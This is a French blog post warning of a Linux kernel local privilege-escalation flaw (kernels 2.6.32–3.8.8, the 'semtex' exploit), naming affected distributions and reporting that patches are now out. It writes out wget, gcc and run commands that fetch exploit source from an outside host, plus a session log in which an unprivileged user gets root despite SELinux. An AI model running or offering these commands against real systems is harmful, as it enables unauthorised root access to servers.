Local Root Exploit sur les kernels 2.6.32 à 3.8.8
Hello les amis !
Petit article afin de vous annoncer une mauvaise nouvelle pour vos serveurs.
Oui car une nouvelle faille vient d’être découverte dans le kernel Linux et qui permet de passer sous ROOT.
Cette vulnérabilité concerne donc les distributions sous Linux et dont le kernel ce trouve entre la version « 2.6.32 » et « 3.8.8 ».
Les versions de RedHat 6.3 et CentOS 6.3 sont également concerné par cette faille ( même avec le SELinux ) et de même que Debian Wheezy 7.
Le moyen de parchet la chose est de mettre à jour le système, par contre c’est pas encore très sûr sur le patch soit sortie actuellement 🙁
Cette faille risque de faire très mal si vous avez une faille CMS avec l’injection d’un WebShell !
De même que si vous utilisez de mode PHP en FPM, l’exploit reste la aussi exploitable.
Sébastien de Tux-Planet nous a fait la démonstration ( que je confirme également sur mon propre système ) :
$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c
$ gcc -O2 semtex.c -o semtex
$ ./semtex
Par exemple sur une distribution sous CentOS 6.3 :
$ cat /etc/redhat-release
CentOS release 6.3 (Final)
$ uname -a
Linux test1.hq.company.com 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=503(user) gid=503(user) groups=503(user)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: enforcing
Mode from config file: enforcing
Policy version: 24
Policy from config file: targeted
$ ./semtex
2.6.37-3.x x86_64
sd@fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Des explications techniques sont lisibles ici et là.
L’article d’origine provient d’ici 🙂
INFORMATION : pour votre information, le kernel 2.6.32 est également touché sur les versions ( RedHat & CentOS ) en 6.3. Par contre pas de confirmation sur les versions ( RedHat & CentOS ) en 6.2, ni même sur la Debian 6.
CORRECTION : du côté des deux distributions, un correctif est sortie et disponible lors de la mise à jour de votre kernel. A vous de jouer maintenant !
![[ Edito ] Blog en standby !](https://archive.djerfy.com/wp-content/uploads/bfi_thumb/dummy-transparent-nifek5r0h98towsigdepzp6cq4xw076kd5775u2ek6.png)
